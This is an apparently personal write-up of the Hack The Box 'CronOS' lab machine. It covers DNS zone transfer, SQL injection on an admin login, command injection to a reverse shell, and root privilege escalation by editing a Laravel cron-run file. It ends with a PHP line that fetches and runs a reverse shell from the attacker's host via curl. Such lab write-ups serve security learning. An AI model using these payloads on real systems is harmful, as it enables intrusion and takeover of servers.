HTB CronOS Writeup
nmap:
HTTP enum:
Default server page found for apache2
try doing nslookup:
commands: nslookup
type: server
now that we see that it's hosting cronos.htb, let's try some zone transfer to discover any other subdomains.
dig AXFR cronos.htb @IP
Go buster didn't have luck.
save the found sub-domains to /etc/hosts
Found the admin page.
try the sql injection
save the post request as login.req and do
sqlmap -r login.req
redirecting happening/
tried using '-- - in the user section and it worked! (intercept the traffic in the burpsuite and url encode it)
now we can execute any commands!
Adjusting the command section in the burpsuite, I was able to execute a command.
Let's try a one liner to get a reverse shell.
tried
Make sure to url encode it. got the reverse shell!
called the shell with python -c 'import pty; pty.spawn("/bin/sh")'
PrevEsc
PrevEsc
host the linpeas.sh and run it
Found a suspicious cronjob
php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
where we can find a kernel cron job:
"app/Console/Kernel.php"
https://vegibit.com/scheduling-commands-and-tasks-in-laravel/
how to set up a cronjob that contains terminal commands
find / -name Kernel.php 2>/dev/null
I located the file in the html and downloaded by visiting the site.
https://www.hackingarticles.in/file-transfer-cheatsheet-windows-and-linux/
Used this guy's method:
let’s just make a temporary copy of bash (as root) and give it the SUID bit.
We add the following code to Kernel.php
…
…then wait a minute for the cron and eventually execute ./sbash -p
from /tmp
.
Another method would be to edit the artisan file and let the system download a reverseshell from our host and execute it.
<?php system('curl http://10.10.14.57/reverse.php | php') ?>
Last updated